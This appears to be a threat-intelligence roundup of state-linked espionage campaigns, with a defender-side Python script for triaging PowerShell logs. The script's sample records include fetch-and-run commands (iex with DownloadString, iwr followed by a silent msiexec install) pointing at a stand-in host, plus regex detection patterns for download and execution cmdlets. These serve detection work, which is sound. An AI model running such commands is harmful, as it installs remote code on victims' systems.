Chinese cybersecurity entities have accused the U.S. National Security Agency (NSA) of orchestrating a cyberattack on Northwestern Polytechnical University, a prominent Chinese institution specializing in aerospace and defense research. The reports claim that the NSA’s Tailored Access Operations (TAO) division conducted a prolonged cyber espionage campaign against the university to steal data. The report details the tools, tactics, and procedures (TTPs) allegedly used by the NSA, providing a rare glimpse into Chinese attribution efforts.
Multiple reports detail Chinese APT groups using custom malware, like JumbledPath, and exploiting vulnerabilities to target U.S. telecom providers and European healthcare organizations. These attacks involve advanced techniques such as exploiting Check Point flaws, deploying ShadowPad and NailaoLocker ransomware, and using PowerShell for data exfiltration, blurring the lines between espionage and financially motivated cybercrime. The campaigns aim to steal data, conduct espionage, and potentially deploy ransomware.
Russian state-sponsored hackers are actively exploiting the “linked devices” feature in Signal Messenger to conduct cyber-espionage campaigns. Groups like APT44 (Sandworm), UNC5792, UNC4221, and Turla target military personnel, politicians, and activists to compromise their secure communications. These actors abuse Signal’s feature to gain persistent access to accounts, using phishing tactics to trick users into linking their devices to attacker-controlled systems. Mandiant warns of the real-time spying risks associated with this activity, which primarily targets Ukrainian entities amidst Russia’s ongoing invasion.
The Chinese cyber espionage group Salt Typhoon is actively expanding its espionage campaign by compromising additional telecom networks globally between December 2024 and January 2025. They are using a custom malware called JumbledPath to monitor network traffic. They are gaining access primarily through stolen credentials and exploiting a six-year-old vulnerability in Cisco routers.
The Chinese nation-state-backed threat actor Salt Typhoon has been actively targeting telecommunications providers, compromising at least five companies between December and January of 2025. This campaign demonstrates the persistence of the group, despite sanctions. Exploitation attempts involved vulnerabilities in Cisco devices, highlighting the continued need for robust security measures in the telecommunications sector.
The RedCurl/EarthKapre APT group has been actively targeting organizations, particularly those in the legal sector, for corporate espionage. The group uses sophisticated techniques, including Indeed-themed phishing emails, to gain initial access. A legitimate Adobe executable is then used to sideload the EarthKapre/RedCurl loader, which exfiltrates data through Cloudflare Workers for command and control. The attackers leverage reconnaissance tools to gather information about the target environment before deploying their loader and exfiltrating sensitive data.
The China-based Winnti Group (aka APT41) is targeting Japanese organizations in the manufacturing, materials, and energy sectors with a new malware campaign dubbed RevivalStone. The campaign employs a novel version of the Winnti malware with enhanced capabilities and evasion techniques.
The EagerBee malware campaign, attributed to the Chinese-linked threat group CoughingDown (APT27), targets government agencies and Internet Service Providers (ISPs) in the Middle East. This campaign uses advanced backdoor capabilities and novel technical implementations for stealth and persistence. EagerBee poses a significant threat to critical infrastructure in the region. Keeping systems up to date and monitoring them for signs of compromise remains important.
Espionage tools typically associated with China-linked threat actors were detected in a November 2024 RA World ransomware attack against an Asian software and services firm. Attackers first focused on cyberespionage in an attack against a Southeastern European country’s foreign ministry in July and compromised the Asian firm by exploiting a Palo Alto Networks PAN-OS flaw and pilfering Amazon AWS S3 bucket data and credentials.
The North Korea-linked APT group Kimsuky, also known as Emerald Sleet, is using a new tactic to compromise its traditional espionage targets. The group is tricking targets into running PowerShell as an administrator and executing malicious code. They build rapport with targets before sending a spear-phishing email with an attached PDF. The PDF’s registration link leads to instructions to open PowerShell as an administrator and paste code provided by Emerald Sleet. If the target runs the code as an administrator, the code downloads and installs a browser-based remote desktop tool. This allows the threat actor to access the device and carry out data exfiltration.
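The chain above (a user pastes attacker-supplied code into an elevated PowerShell, which then downloads and installs a remote-access tool) leaves a recognisable footprint in script-block logging. As an added defender-side example that is not from the page or the cited reports, the Python below triages constructed records modelled on PowerShell ScriptBlockLogging (Event ID 4104) enriched with an elevation flag; the record fields, URLs and regexes are assumptions, not telemetry from the campaign.

```python
import re

# Constructed sample records (illustrative only, not real telemetry):
# a 4104-style script block text plus whether the host process ran elevated.
SAMPLE_BLOCKS = [
    {"id": 1, "elevated": True, "script": "Get-ChildItem C:\\Users\\j.doe\\Documents"},
    {"id": 2, "elevated": True,
     "script": "$u='https://example.invalid/s.ps1'; iex (New-Object Net.WebClient).DownloadString($u)"},
    {"id": 3, "elevated": False,
     "script": "Invoke-WebRequest https://example.invalid/t.msi -OutFile $env:TEMP\\t.msi"},
    {"id": 4, "elevated": True,
     "script": "iwr https://example.invalid/t.msi -OutFile $env:TEMP\\t.msi; msiexec /i $env:TEMP\\t.msi /qn"},
]

# Heuristic indicators for the two halves of the described chain:
# fetching remote content, then running or installing it.
DOWNLOAD = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile|Start-BitsTransfer",
    re.I,
)
EXECUTE = re.compile(r"\biex\b|Invoke-Expression|Start-Process|\bmsiexec\b|\.exe\b", re.I)


def score_block(rec):
    """Return (score, reasons) for one record; 3 means every indicator fired."""
    reasons = []
    if rec["elevated"]:
        reasons.append("elevated host")
    if DOWNLOAD.search(rec["script"]):
        reasons.append("remote download")
    if EXECUTE.search(rec["script"]):
        reasons.append("execute/install")
    return len(reasons), reasons


def triage(records, threshold=3):
    """IDs of blocks that download and run/install content from an elevated session."""
    return [r["id"] for r in records if score_block(r)[0] >= threshold]


if __name__ == "__main__":
    for r in SAMPLE_BLOCKS:
        s, why = score_block(r)
        print(f"block {r['id']}: score {s} {why}")
    print("flagged for review:", triage(SAMPLE_BLOCKS))
```

Lower-scoring blocks (a download without execution, or elevation alone) are not flagged by default but can be surfaced by lowering the threshold when hunting.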
The Sandworm group, a Russian military cyber-espionage unit, is actively targeting Windows users in Ukraine. They are distributing trojanized versions of Microsoft Key Management Service (KMS) activators and fake Windows updates to compromise systems. This campaign highlights the ongoing cyber warfare efforts by Russian actors and the potential risks associated with using unofficial activation tools.